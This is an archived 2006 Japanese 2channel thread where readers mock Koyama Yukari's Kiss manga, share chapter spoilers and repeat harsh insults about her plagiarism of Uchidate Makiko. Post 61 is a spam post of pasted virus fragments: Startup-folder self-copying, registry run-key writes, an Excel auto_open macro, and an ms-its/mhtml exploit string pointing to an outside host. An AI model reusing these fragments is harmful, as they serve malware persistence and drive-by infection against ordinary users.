2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

あぁ…平地で土砂崩れ発生 こやまゆかり20

1 :花と名無しさん:2006/11/24(金) 10:25:03 ID:???0
平地で土砂崩れが発生!私達帰れない━━━━━━!?
空き部屋があるか確認もせずJRがホテルを用意してくれたけど
当然ツインが一部屋しかなくてあたし達いったいどうすれば━━━━━━…!!
初回ネタバレ済みのハーフアンアップルは放置しっぱなしで今後どうなる!?

というkissで今一番目が離せない間違い探し・・・ゲフンゲフン
目が離せないこやま流オサレセンスな漫画をマターリ語り合うスレです..。。oo○○

***sage進行推奨***

前スレ
あぁ…ふつーそーゆーどーなんの こやまゆかり19
http://comic6.2ch.net/test/read.cgi/gcomic/1160151848/

過去スレはにくちゃんねるで「こやまゆかり」で検索してください。
http://makimo.to/2ch/index.html

2 :花と名無しさん:2006/11/24(金) 10:25:43 ID:???0
過去スレタイトル一覧

こやまゆかりを語ろう
「あぁ…マルが飛ぶんだ…」 こやまゆかり2
「あぁ・・・ぼたん雪も飛ぶよ」こやまゆかり3
「ああ・・・しゃぼん玉警報が・・」こやまゆかり4
「あぁ・・・(口無し顔縦線)」こやまゆかり5
「あぁ・・・コピー好きだなぁ」こやまゆかり6
「ああ…また主人公マンセーオチかよ」こやまゆかり7
あぁ…誰とも向き合えない…こやまゆかり8
あぁ…こじゃれバーだよ全員集合 こやまゆかり9
あぁ…ウィンク乾杯泣き笑いこやまゆかりスイート10
ああ…顔は縦線ジーンズ横線 こやまゆかり11
ああ…セカンドバッグで携帯ポロリンこやまゆかり12
ああ…毛穴スチーム茶番調停 こやまゆかり13
ああ・・ケータイからでも公衆電話表示こやまゆかり14
ああ・・トサカ伝説の女神イクユメチン こやまゆかり 15
ああ…場末スナック一括払い こやまゆかり16
ああ…アトピー美談で一発採用こやまゆかり17
【クリエイティブな】こやまゆかり18【靴屋のBサン】←不本意 *スレスト*
あぁ…ふつーそーゆーどーなんの こやまゆかり19

3 :花と名無しさん:2006/11/24(金) 10:40:56 ID:???O
ここは1を馬鹿にするスレッドになりますたw

4 :花と名無しさん:2006/11/24(金) 10:57:06 ID:???0
( ゚ ゚)ポカーンそんな…..。。oo○○

5 :花と名無しさん:2006/11/24(金) 14:19:39 ID:???O
1乙。
早く立てた詫びとして
ホテルのロビーで一泊しなさい。

6 :花と名無しさん:2006/11/24(金) 15:58:56 ID:???0
1乙。
早すぎの詫びに自分のカレンダーメモ全部「排卵日」で埋めろw

7 :花と名無しさん:2006/11/24(金) 16:42:56 ID:???0
1乙。
早漏の詫びとして緑茶一瓶身体に振りかけて来い。

8 :花と名無しさん:2006/11/24(金) 23:07:00 ID:???0
1乙。
早すぎの侘びに緑茶ふりかけたからだで
びしょ濡れスーツを抱きしめなさい

9 :花と名無しさん:2006/11/25(土) 01:59:01 ID:???0
1乙。
早すぎの詫びにケータイにひょーたんストラップを付けるように。

10 :花と名無しさん:2006/11/25(土) 03:54:45 ID:???O
>1乙
早ryに木の枝でひょーたん作ってうpしろ。

11 :花と名無しさん:2006/11/26(日) 07:28:55 ID:???0
ひょーたんホシュ

12 :花と名無しさん:2006/11/27(月) 02:34:59 ID:???0
こっちもひょーたんか

13 :花と名無しさん:2006/11/27(月) 09:02:09 ID:???0
じゃあこやまネタでしりとりしようよ!

ひょうたん

14 :花と名無しさん:2006/11/27(月) 15:03:40 ID:???0
ここで前スレ922タソが颯爽と登場!

15 :花と名無しさん:2006/11/27(月) 20:38:05 ID:???0
よし、グリーンティからだ!

16 :花と名無しさん:2006/11/27(月) 22:42:33 ID:???0
ぃょーたん

17 :花と名無しさん:2006/11/27(月) 23:46:26 ID:???0
前スレよく埋まったなw

18 :花と名無しさん:2006/11/28(火) 02:00:01 ID:???O
ひょーたん祭り乗り遅れた
おまいら楽しそうだな(´・ω・`)

19 :花と名無しさん:2006/11/28(火) 09:00:45 ID:???0
いや〜ここ数日のこやまスレは非常に楽しかったw

20 :花と名無しさん:2006/11/28(火) 13:40:26 ID:???0
つくづく、こやまんがの需要って「ネタ」だけだけ!!と実感w。



21 :1:2006/11/28(火) 15:07:56 ID:???0
>>19
私に感謝しなさい。

ひょーたん

22 :花と名無しさん:2006/11/28(火) 15:30:00 ID:???O
>>21
臭いが足りないから
ちゃんとロビーで寝て目一杯緑茶ふりかけてこい

23 :花と名無しさん:2006/11/28(火) 18:22:34 ID:???0
>>21
バカタレ。先走った>>1のせいでスレが殺伐としないように
住人が気を使ったんだろうが。

侘びとしてタバコスパゲッティ1`

24 :花と名無しさん:2006/11/29(水) 20:19:14 ID:???0
ひょーたんスパゲティ

25 :花と名無しさん:2006/11/29(水) 20:34:39 ID:???0
ひょーたんサンドイッチ

26 :花と名無しさん:2006/11/29(水) 20:45:40 ID:???0
         旦旦旦旦旦旦旦旦
         旦旦旦旦旦旦旦旦
         旦旦旦旦旦旦旦旦
         旦旦旦旦旦旦旦旦
         旦旦旦旦旦旦旦旦   
         旦旦旦旦旦旦旦旦
         旦旦旦旦旦旦旦旦     ∧__,,∧
.   ∧__,,∧   旦旦旦旦旦旦旦旦     ( ・∀・)
   ( ´・ω・)   旦旦旦旦旦旦旦旦     (し   つ日 ザパー
.   /ヽ○==○旦旦旦旦旦旦旦旦  旦旦と__)__) 川
  /  ||_ | 旦旦旦旦旦旦旦旦旦 |____| ヽ(`Д´)ノよっしゃこいゴルァァァァァァァ
  し' ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_))   (_っ,,っ
                                  ↑>>1

27 :花と名無しさん:2006/11/29(水) 22:47:19 ID:???0
ひょーたんサワー

28 :花と名無しさん:2006/11/29(水) 23:28:39 ID:???0
ひょーたんの首飾り

29 :花と名無しさん:2006/11/29(水) 23:31:00 ID:???0
ひょーたん色の髪の乙女

30 :花と名無しさん:2006/11/29(水) 23:49:24 ID:???O
ひょーたん接待

31 :花と名無しさん:2006/11/30(木) 00:08:33 ID:???0
ひょーたん製薬

32 :花と名無しさん:2006/11/30(木) 01:08:38 ID:???0
ひょーたんストア

33 :花と名無しさん:2006/11/30(木) 09:47:32 ID:???0
いいかげんひょーたんしつこいよ。
もうホシュできてんだから、無理に埋めなくても。

34 :花と名無しさん:2006/11/30(木) 10:03:17 ID:???0
みんなが楽しんでるのに水さすなよ、こやま

35 :花と名無しさん:2006/11/30(木) 11:57:32 ID:???0
さすがに飽きたよ。
前スレから100レスもひょーたんばっかなんだもん。
この調子じゃ発売までに200近くひょーたんだけで
埋まっちゃうよw

36 :花と名無しさん:2006/11/30(木) 12:49:20 ID:???0
じゃあなんか話題ふりなよ

37 :花と名無しさん:2006/11/30(木) 23:49:17 ID:???0
>>36
今後の展開については結構出尽くしたからなぁ…。
じゃ、次の連載への予想!

38 :花と名無しさん:2006/12/01(金) 01:17:54 ID:???0
次回予想。

天野が突然ひかるに差し出したものは、いつかの白いひょーたん。
営業に行くたびにさり気なくその場に目を走らせていたところ、
ある日突然見つけてしまったらしい。
ずっと気に留めていてくれた事にひかる「トクソ…トクソ…」となる。

39 :花と名無しさん:2006/12/01(金) 02:13:54 ID:???O
暇だからウィキで瓢箪探したら無かった(´・ω・`)

40 :花と名無しさん:2006/12/01(金) 04:00:04 ID:???0
>>39ヒョウタンでも良ければ
つ ttp://ja.wikipedia.org/wiki/%E7%93%A2%E7%AE%AA

41 :花と名無しさん:2006/12/02(土) 06:31:19 ID:???0
多分ガイシュツだろうけど
ナツコのやった事ってレイプと変わらない気がするけど
そんな妊娠が震動の心を繋ぐ鎹になるのかな
その前にあれだけ正体不明な震動はヤった事を覚えていなくて
夏子の浮気の子だとしか思わないのかもと心配だよ

42 :花と名無しさん:2006/12/02(土) 12:47:10 ID:???0
翌朝乾いてパリっと…下品すぎorz

43 :花と名無しさん:2006/12/02(土) 13:26:55 ID:???0
先っぽにひとひらの雪のようなティッシュがへばりついていたとか

44 :花と名無しさん:2006/12/02(土) 14:02:52 ID:???0
心を繋げるかどうかは怪しいけどどうせ振動なんだし
「やった」と言われたらそのまま信じるだろ

45 :花と名無しさん:2006/12/02(土) 16:19:00 ID:???0
だから奈津子は不妊症だってばw

46 :花と名無しさん:2006/12/02(土) 17:13:08 ID:???0
天野の発言は割とまともに見える。
あれが作者の目線だとしたら、作品自体が釣りなのか?

47 :花と名無しさん:2006/12/02(土) 18:25:51 ID:???0
作品自体、糞なのに、そこに出てくるキャラがまともなはずがない。
天野も例外ではなくあんまり、まともには見えない。
(理由)
本当に正義感が強くて、振動の親友(の事思っての事)なら
振動が、自暴自棄になって奈津子と結婚する前に、ひかるの本心
(ひかるが振動を振ってから酒場でくだをまいてる所に遭遇してたし)
知ってるんだから、何かアクション起こせたはず。
それを傍観してるんだもんな。キャラがたってない。
やっぱり、所詮こやまんが、まともそうなのが1人もいない。

48 :花と名無しさん:2006/12/02(土) 18:31:41 ID:???0
>>45
昨日のサスペンスでも、「不妊症」が謎解きに使われていたヨ。
もっともこちらは男の方が「無精子症」だったンだけど、
このネタは結構使われるんだね。

49 :花と名無しさん:2006/12/02(土) 19:15:06 ID:???0
某にっけいしんぶんの愛ルケについてのブログを読み返して
そしてこのスレに来て思う

こやまんがは愛ルケと同じように読める佳作であると

50 :花と名無しさん:2006/12/02(土) 21:48:55 ID:???0
>>49
どっちも突っ込み作品としては傑作だねw
でもズン先生は何度も映画化されてるから
さすがにこやまんがと同じだとカワイソス

51 :花と名無しさん:2006/12/02(土) 23:26:59 ID:???0
>47
それこそが、ひかるも震動も奈津子もどうでもいい。構いたくない
と、いう至極まともな行動に思えるw

52 :花と名無しさん:2006/12/03(日) 02:07:14 ID:???0
そろそろもっとキーッツとなってる奈津子が見たいなあ

妊娠すると思ったのに…生理きちゃったじゃない…!タテ筋
ひかるのせいじゃないのにそれすらも
ひかるへの憎しみの材料になって行き…
毎月訪れる生理に発狂した奈津子、包丁もってひかるにアタック!
ドスッ…
空からは雪が降ってきて
倒れたままぼうっとする頭で空を見つめるひかる

あぁ…

で次回に続く。
あ、でも雪が降ってくる演出だと○が飛ばせないな。
雪と見分けつかんしw


53 :花と名無しさん:2006/12/03(日) 10:21:05 ID:58aED11sO
今、紅葉狩りに来てるんだけど
どうやらここの名産品がひょーたん・・・

ひょーたん専門店があった

54 :花と名無しさん:2006/12/03(日) 10:48:24 ID:58aED11sO
ひょーたん会館も発見

55 :花と名無しさん:2006/12/03(日) 11:02:30 ID:???0
岐阜?

56 :花と名無しさん:2006/12/03(日) 17:22:46 ID:???0
(もう、)ひょーたんは秋田よ。

57 :花と名無しさん:2006/12/03(日) 21:44:34 ID:fuvkxUba0
>>55
養老の滝(岐阜)

58 :花と名無しさん:2006/12/03(日) 22:01:16 ID:???0
>>57
> >>55
> 養老の滝(岐阜)

 んじゃ、養老町の星を探した方がよほど有意義だな

59 :花と名無しさん:2006/12/04(月) 01:20:11 ID:???0
ちょっw w それw w 幸ちゃん w w w


60 :花と名無しさん:2006/12/04(月) 14:14:48 ID:???0
>>47
天野が親友の振動の結婚を止めなかったのは、この時点で天野がひかる
のことが好きで、振動とひかるが別れるのは天野に取って好都合。だから傍観していた。
という説まで過去スレで出てたくらいだし…やっぱり天野だってまともなキャラではないと思う。

61 :<body onload=window()>:2006/12/05(火) 07:58:12 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

62 :花と名無しさん:2006/12/05(火) 17:14:03 ID:???0
んもー!またウイルスコードかよ!うっとしーな

63 :花と名無しさん:2006/12/05(火) 22:06:05 ID:???0
しかし、50レスをとうに過ぎたあたりでくるのがこやまクオリティww

64 :花と名無しさん:2006/12/05(火) 22:24:03 ID:???0
それもスレ立って10日以上経つのにね
さすがこやまクオリティw

65 :花と名無しさん:2006/12/06(水) 09:20:25 ID:???0
随分遅かったよね
ひょーたん祭りだったから邪魔するまでもないと思ったのか?

66 :花と名無しさん:2006/12/06(水) 17:29:10 ID:???O
今発売中のマガジン掲載のトッキュー!に
こやまん風絵柄のコマがありますた。
○飛んでて顔にタテ線入ってます。

67 :花と名無しさん:2006/12/07(木) 09:42:58 ID:???0
>>66
見たよ。吹いた。
あれって、こやまが描いたのかな?
自分で自分をパロってんのか?
たった3コマで見事なまでにこやまんがにしてた。

68 :花と名無しさん:2006/12/08(金) 17:58:40 ID:???O
明日発売のkissに連載漫画に合わせての
読者プレゼント企画があったんだが(ちなみにのだめはipod)
林檎は乾燥肌対策の化粧品セットですた。
こやまんがのサムさに身も心も乾燥してるかたも応募してみては?w

69 :花と名無しさん:2006/12/10(日) 02:28:30 ID:R1ruY24cO
トッキューの作者、昔キスに書いてたしね。ペンネーム今と違うけど。

70 :花と名無しさん:2006/12/10(日) 08:49:51 ID:KyrlmdMQ0
>>66
シンクロウがハンパな終わり方で気になるww

71 :花と名無しさん:2006/12/11(月) 00:01:04 ID:???0
シンクロウのエンディングは「そりゃねーべ」と思った。便乗スマソ

72 :花と名無しさん:2006/12/11(月) 08:51:20 ID:???O
マガジン読んでる方意外といるのねw

73 :花と名無しさん:2006/12/11(月) 09:45:40 ID:jtK2tWaK0
>>66
私もトッキュー読んで気になりました。
思わず作者のこと調べちゃったよ。


74 :花と名無しさん:2006/12/11(月) 13:36:23 ID:???O
会社のPCでうっかりここ開いてしまって
ウイルス拾ってしまいましたorz

75 :花と名無しさん:2006/12/11(月) 14:05:30 ID:???0
>>74
ただのウイルスコードだから無問題

76 :花と名無しさん:2006/12/11(月) 22:41:02 ID:???O
>>66
かなりびっくりしたよ。
あれ、揶揄してんの?
絶望先生みたいに…

77 :66:2006/12/12(火) 09:08:40 ID:???O
トッキュー作者が描いた単なるパロディなのかなー。
本人が描いたならどこかに「こやまセンセが遊びに来て・・・」とかコメントありそうだけどなかったし。

だとしたら
こやまんがの特徴をよくとらえた3コマだったと思いまつ。

78 :花と名無しさん:2006/12/14(木) 06:02:01 ID:???0
休載長いね〜
何だかんだ言って楽しみにしてるんだな、自分w

79 :花と名無しさん:2006/12/14(木) 08:47:41 ID:???O
休載の長さに絶望した

80 :花と名無しさん:2006/12/14(木) 14:04:26 ID:???O
来週の金曜には早売りだからあと1週間だお

81 :花と名無しさん:2006/12/14(木) 17:46:58 ID:???0
>79
いやだなあ、これは充電ですよ
先生は素晴らしい展開と共に私たちの前に戻ってきてくれますよ

82 :花と名無しさん:2006/12/14(木) 20:00:00 ID:???0
>>81
こんなところでカフカちゃんに出会うとは…世界のせまさに絶望した

83 :花と名無しさん:2006/12/14(木) 20:20:14 ID:ttY8mmWxO
来週には祭状態になるのかしら?

84 :sage:2006/12/15(金) 22:08:40 ID:EzFTmsn80
今週の週刊朝日の内舘牧子のエッセイで、自分のエッセイがまるまる
漫画でパクられ、その漫画家は追放に近い処分を受けた、って
書いていたけど、これ、こやまゆかりだよね?復活してるの
知ってるのかな〜?集英社って甘いね。

85 :花と名無しさん:2006/12/15(金) 23:08:07 ID:???0
Kissは講談社?では?
本当に甘いよね。こーだんしゃ。それに甘んじて
居座ってるこやまもこやま。この漫画の主人公そのもの。
ごきぶり並みの図太さには言葉もない。
同じパクリで謹慎中の末次由紀ももーすぐ復活かな?
講談社はパクリ屋の巣窟。


86 :花と名無しさん:2006/12/15(金) 23:13:36 ID:???0
末次を許したらイノタケ様に版権引き上げられちゃうんじゃ

87 :花と名無しさん:2006/12/16(土) 08:53:38 ID:???O
こやまのパクリ、登場人物の名前まで内館さんと同じだったらしいね。さいてー

88 :花と名無しさん:2006/12/17(日) 03:06:53 ID:???0
満喫行った時に是非チェックをしなくては。
その前に内舘さんのどの作品のどのエピなのか
思い出せるかどうか不安…

89 :花と名無しさん:2006/12/18(月) 00:41:24 ID:???0
それで今もまだ連載してるってすごいね

90 :花と名無しさん:2006/12/19(火) 20:55:23 ID:???0
>>87
えぇぇぇぇ〜〜
それって、盗作発見してくれと言ってるようなもんじゃ・・・
本当に心底最低!!

91 :花と名無しさん:2006/12/20(水) 18:37:37 ID:???0
予告で奈津子がすごい顔で泣いてたね。1日はや売りで24日日曜だから
土曜日発売の我が地区。楽しみだ。

92 :花と名無しさん:2006/12/20(水) 22:09:22 ID:???0
>>91
あの奈津子の泣き顔は前号のコピペ。
ひかるの緑茶の残り香が振動の背広にあるのを知って
自分にはつれない振動に、くやしがってるシーンで使われたお。
手抜きのこやまがわざわざ、予告に新たに描きおろす訳ないよん。
自分ももっと、ひどい顔になる奈津子を期待。

93 :花と名無しさん:2006/12/20(水) 22:13:10 ID:???0
早売り地区 土曜日も祭日だから金曜の発売じゃないの?

94 :花と名無しさん:2006/12/20(水) 22:14:23 ID:???0
奈津子もストレスでアトピー発症。サンドイッチガツガツ女の顔に。


95 :花と名無しさん:2006/12/20(水) 22:39:06 ID:???0
そーだね。早い所だと、金曜の朝ぐらいには読めるだろうね。
週末、バレ師さん。頼んまっさ。

96 :花と名無しさん:2006/12/21(木) 19:23:01 ID:???0
もしも昼ドラでドラマ化されたら
やっぱり奈津子は小沢真珠かなw

97 :花と名無しさん:2006/12/21(木) 21:29:58 ID:???0
ドラマ化率が多いKISSの中でこやまんががドラマ化されてないのは
盗作漫画家だということも要因の30パーセントぐらいあるのかな?

ま、一番はこやまストーリーのダメさのせいだけど〜w

98 :花と名無しさん:2006/12/21(木) 21:56:52 ID:???0
>>97
問題にされた作品以外にも盗作があるかどうかをチェックしてまで
起用しないだろうね。
パクリ作家のレッテルを貼られると(ry

99 :花と名無しさん:2006/12/21(木) 22:04:39 ID:???0
>>97
禿同。そーだね。盗作して抗議された時点で表だった活動はできなくなったんじゃない?
変にドラマ化されて内館さんの目にでも止まったりしたら、
追放したはずなのに・・。まだ、恥ずかしくもなく活動してるのかってなことに
なりかねないしね。まあ、盗作するくらいの漫画家なんかの作品、オリジナルでも
皆さん、周知の通り、糞ばっかでドラマ化なんかされないけどね。。

100 :花と名無しさん:2006/12/22(金) 00:16:15 ID:???O
早売りゲトしました
とうとう連載再開です!!ってありましたが
とうとうって使い方あってないよいに思えるんですが…
天野出番増えてましたよ

101 :花と名無しさん:2006/12/22(金) 01:16:27 ID:???0
>>100
こやまはあとまわしでのだめバレスレにw

102 :花と名無しさん:2006/12/22(金) 02:07:33 ID:???0
バレまだー?w

103 :花と名無しさん:2006/12/22(金) 08:43:18 ID:???O
出勤前コンビニ立読みしたので。詳細は他の方おながい

・迷言きますたw「最強のゴキブリになりや」
・奈津子妊娠発覚か??で次号。
・表紙煽り
「やばい ハマった!たくさんのお便りに応えて連載再開」←ネタ?w

104 :花と名無しさん:2006/12/22(金) 18:02:44 ID:???0
詳細書くほどおもしろくない
月曜日に立ち読みする程度でおk

105 :花と名無しさん:2006/12/22(金) 19:08:47 ID:???0
>>104
いや〜ん、いけず! いつものようなツッコミどころはないの?

106 :花と名無しさん:2006/12/22(金) 23:20:13 ID:???O
個人的には奈津子の排卵日(予定日?)の数え方が
「32 33 34 …」ってところが気になった。
1ヵ月と○日でいいじゃん。1から数えてんのか?お前は。
今回は本当にツッコミどころも盛り上がりもありませんでした。
連載再開期待してたのに(*´Д`)=з
KC発売予告の煽りは、
「韓流ドラマよりはまると評判です!」

107 :花と名無しさん:2006/12/22(金) 23:26:02 ID:???O
あと、表紙の裏が一番オサレでした。

108 :花と名無しさん:2006/12/23(土) 04:20:36 ID:???0
あぁ…主人公はゴキブリ こやまゆかり

109 :花と名無しさん:2006/12/23(土) 13:17:35 ID:???0
あんたもつくづく、ゴキブリ女ね。こやまゆかり。
駆除したつもりが、あちこち糞(作品)撒き散らして
ゴソゴソ生き残ってんの。
                   内館牧子
          

110 :花と名無しさん:2006/12/24(日) 16:08:22 ID:???O
バブルを思い出す現代の作品にこやまんがが。
http://bubble4.2ch.net/test/read.cgi/toilet/1158325609/

111 :花と名無しさん:2006/12/24(日) 17:24:10 ID:???0
トイレットついてる時点で踏む気になれないよw

112 :花と名無しさん:2006/12/24(日) 20:59:56 ID:???0
トイレネタ?
>>110
さんのは見てないけど下品なこやまならではのタイトルw。
過去「ホの痔」の中で、主人公がダンナのあとにトイレに入って
便座が上がってるのに気がつかずに座りそのまま、ボトムレス状態で
風呂場へ駆け込みケツ洗い・・。という、何とも下劣なシーンがあった。

113 :花と名無しさん:2006/12/25(月) 01:40:00 ID:???0
>>112
私も踏んでないけどたぶんトイレ版とかに飛ばされるんだと思う・・・

こやまが下品なのには変わりないけどね!

114 :花と名無しさん:2006/12/25(月) 14:35:26 ID:???0
「林檎」でも、アトピー発症して便秘解消の為に、玄米食っての下りで
ニンニク女と「(ウンコ)おっきいーのが出たー!」とか言ってたトイレのシーンがあったな。

115 :花と名無しさん:2006/12/26(火) 01:18:31 ID:???0
昨日なんとなく大掃除への餅があがらなかったので
ネタバレ作ったらえらい長文になった。
良かったら投下するけどいる?

116 :花と名無しさん:2006/12/26(火) 01:42:06 ID:???O
振動の『グリーンティか』
に吹いた
ふつー香水の名前なんぞおぼえねーだろw
これは、グリーンティでもう一ネタ投下されそうだ

117 :花と名無しさん:2006/12/26(火) 01:52:01 ID:???0
未だ見てないからよくわかんないけど、
あんなに酔っ払ってたのに、振動は最後まで奈津子とやったのか。
さすがこやまんが。匂いだけで、やっちゃう振動って畜生動物みたい。


118 :花と名無しさん:2006/12/26(火) 02:00:46 ID:???0
基地外奈津子「妊娠」最悪w。
振動は望んでないのに、生まれてくる子供が可哀相。
ここでもこやまは子供を、基地外女の小道具にするんだ。

119 :花と名無しさん:2006/12/26(火) 02:28:05 ID:???O
想像妊娠に3000グリーンティ
『子供ができないのはヒカルさんのせいだわっ』
と奈津子逆上
会社に乗り込み乱闘
という話はどうでしょうかこやまちぇんちぇー

120 :花と名無しさん:2006/12/26(火) 02:53:26 ID:???0
 人面魚はスルー?

121 :花と名無しさん:2006/12/26(火) 06:50:05 ID:???0
ひかるもなんで残るんだか。
「あの人が変わったのは私のせいだわ
いじめられても耐えて治してあげなきゃ」とか
陶酔ヒロインこやま好きそうだよな。

122 :花と名無しさん:2006/12/26(火) 07:44:49 ID:???O
本当に
いっそ、ヒカル転勤→振動出張→転勤先でエチー→ヒカル妊娠
とかなら、内館牧子も週末婚の焼直し、グッジョブ!
って感じで過去を許してくれ(ry

123 :花と名無しさん:2006/12/26(火) 08:00:48 ID:???0
>>115
今、立ち読みすら出来ない身の上なので
おながいします。

124 :花と名無しさん:2006/12/26(火) 14:22:46 ID:???0
スレ読んでるだけだけど
振動は失脚(クビ)しないの?今回の派閥争いの結果、赤堀部長が栄転?するだけの事か?
何かやっぱりこやまだよな、中途半端なしょぼい展開w。


125 :花と名無しさん:2006/12/26(火) 14:33:58 ID:???0
>>123
では長文で申し訳ないけど落とします。
間違ってたら皆でつっこんでやってくださいm(__)m
>123さん病気かオメデタ?
どちらにしろお大事にね。

126 :ネタバレ 1/2:2006/12/26(火) 14:37:16 ID:???0
>>109
ひかるのデパート進出に関する告発で会議室で正面対決する
赤堀部長と振動。
「これで完全に敵だな」という振動に言われショックを受けるひかる。

奈津子はグリーンティーの残ったシーツをわしづかみにし、
エチシーンを回想。
ひかると奈津子を錯覚した振動が初めて自分に見せた切なく愛しそうな
表情に激しい嫉妬に駆られ、マンソンのゴミ捨て場に香りの残ったシーツや
服を叩き捨てる。(一応袋入り)
「早く子供がほしい。一刻も早く雅人さんをわたしのだけものにして、
あの女をボロボロにしてやりたい………!!」
ひかるへの復讐を誓う奈津子。

ひかるは一緒に外回りする天野に最近の経緯を話し、天野は落ち込む
ひかるを見て自分が出る予定のクリスマスパーティーに誘う。
どんなメンバーでのパーティーか知らずに半ば強引に誘われたパーティーは
少林寺の練習生やその家族のものだった。
子供相手に本気で遊ぶひかるは、子供に慕われる天野を再度認識。
周囲の「子供は本質を見抜くからね」という言葉に改めて彼を見直したような
視線を送る。
落ち込みグシャグシャ考えながらクリスマスを過ごしていたかも知れなかった
ひかるは天野の気遣いで立ち直る。
(ここで人面魚のキーホルダーが子供たちへのプレゼントの余りとして
天野からひかるにプレゼントされる)

127 :花と名無しさん:2006/12/26(火) 14:37:46 ID:???0
>>123
さんではないけど
))125
さんお疲れ。お願いし安。

128 :ネタバレ 2/2:2006/12/26(火) 14:38:31 ID:???0
派閥の長である専務が、ひかるは邪魔だから地方の支社に飛ばせばすぐに
辞めるだろうと提案するが、振動は自力で何とかするからと拒否する。

デパートの担当は結局振動になり、これまでの功績も横取りされたような形で
赤堀部長と振動の対決は振動に軍配が上がった。
振動を責めるひかるは、逆に振動に赤堀部長も異動になるし、ひかるにも異動
してもらうと宣告される。

その後、赤堀部長は素直に負けを認め派閥の長である常務の力で他の部署への
異動が決まった。
ひかるの今後の立場を心配し一緒に異動しようと誘うが、Re-1への愛着を
捨てきれないひかるは残留を希望し、赤堀部長も尽力することを約束する。
(ここで今回の迷言「最強のゴキブリになりや!」が飛び出す)

振動に異動はしないと啖呵を切るが、「どうなっても知らないぞ」と言われる。
ひかるを守ろうとしたのに上手く行かない事に複雑な表情の振動。

一方でカレンダーを1から数えてお腹を抱えて喜びの表情を見せる奈津子−−。
(以下次号)




129 :花と名無しさん:2006/12/26(火) 14:41:12 ID:???0
実際にうpすると本当に長いね
日本語変だし1行1行も長くてごめん。
これで大掃除に戻りますw

130 :花と名無しさん:2006/12/26(火) 15:05:24 ID:???0
>>129
乙彼でした!
こやまって「周囲に慕われてるシーン→いい人なんだぁ」が多いね。
結局震動は奈津子とセークスした事を覚えてなんだろうか。


131 :花と名無しさん:2006/12/26(火) 16:06:09 ID:???0
>>129
乙彼でした。大掃除も頑張ってください。
普通、朝目覚めたら、奈津子が裸で隣に寝てりゃそりゃ気付いて顔に縦線じゃないの?
奈津子の妊娠?とかも31,32ってカレンダー見て数えてるって何やってんの?
今は、セクースやって1、2週間目で、妊娠したかがわかる時代だぞ。


132 :花と名無しさん:2006/12/26(火) 16:27:28 ID:???0
シーツを捨てた次の日くらいに31、32と指折り数えてるようにしか思えない時系列。

133 :花と名無しさん:2006/12/26(火) 16:35:03 ID:???0
奈津子の「どうしていつまでもあの女に苦しめられるの?」
て台詞、それは本来ひかるの言葉ではなかろうか?
略奪したの奈津子の方なのに。

134 :花と名無しさん:2006/12/26(火) 16:36:13 ID:???0
こやま時間って摩訶不思議でつね。

135 :花と名無しさん:2006/12/26(火) 17:19:04 ID:???O
久しぶりの連載再会を楽しみにしてたのに
内容イマイチでがっかり

136 :花と名無しさん:2006/12/26(火) 18:14:57 ID:???0
振動はもう左遷させられそうな雰囲気満々だね。
で、すったかもんだかの上最後はヒカルは振動とくっついてお終い。
天野は何のためにいたんだか。

137 :花と名無しさん:2006/12/26(火) 20:58:23 ID:ODvZqJJlO
今まで、こやまんががクソかと思ってたら、スケートや今号からの先生とか、下には下がいたのね。

138 :花と名無しさん:2006/12/26(火) 21:59:09 ID:???0
扉の裏のジェムケリーの広告がこやまんがによく似合うこと

139 :花と名無しさん:2006/12/26(火) 23:43:46 ID:???0
いや!!スケートとかはこやまよりはマシだよー

140 :花と名無しさん:2006/12/26(火) 23:58:07 ID:???0
こやませんせいは、ここを見ておられるだろうか?

141 :花と名無しさん:2006/12/27(水) 00:07:21 ID:???0
>>133
奈津子はあんな無茶な略奪したのに、結婚さえすれば、振動が愛してくれる
相思相愛になれるって本気で信じてる節があるのですよ。
そして振動が自分の方を向かないのはひかるのせいだと思っている。
いくら強引な手使って結婚しても未だ片思いなのに気がついてないのですよ。奈津子は。

142 :花と名無しさん:2006/12/27(水) 00:40:35 ID:???0
奈津子が妊娠しようがしなくても
多分、この夫婦、これからもっと状況は悪くなるんだろうね。
子供さえできりゃ、振動が自分に振り向いてくれて愛してくれると思っている
よーだが、かえって逆効果になりそ!基地外奈津子は、本当、壊れてるね。


143 :花と名無しさん:2006/12/27(水) 00:46:21 ID:???O
振動家の子供のなまえを考えよう
女子なら奈津子が『ひかる』とか名付けそうw


144 :花と名無しさん:2006/12/27(水) 00:53:50 ID:???O
>>137スケートは絵が安定してるしコピーじゃない

145 :花と名無しさん:2006/12/27(水) 01:04:10 ID:???0
>>144
同!
盗作漫画家なんかと比べるなんて小川先生に失礼ですな。
ひょーたんの次は「人面魚」でつか?
もうここから、何かが違ってるんだよこやま。
すごいセンスだね。感心するよw。

146 :花と名無しさん:2006/12/27(水) 01:19:12 ID:???0
でも前にkissスレだったかもしれないけど
こやまはデッサンは安定していると言われていたので
絵は皆も認めてるのかなと思ってた。

147 :花と名無しさん:2006/12/27(水) 01:31:39 ID:???0
頭の悪そうな馬面男、ダンゴ鼻、斜線、縦線、しゃぼん玉を描かせたら
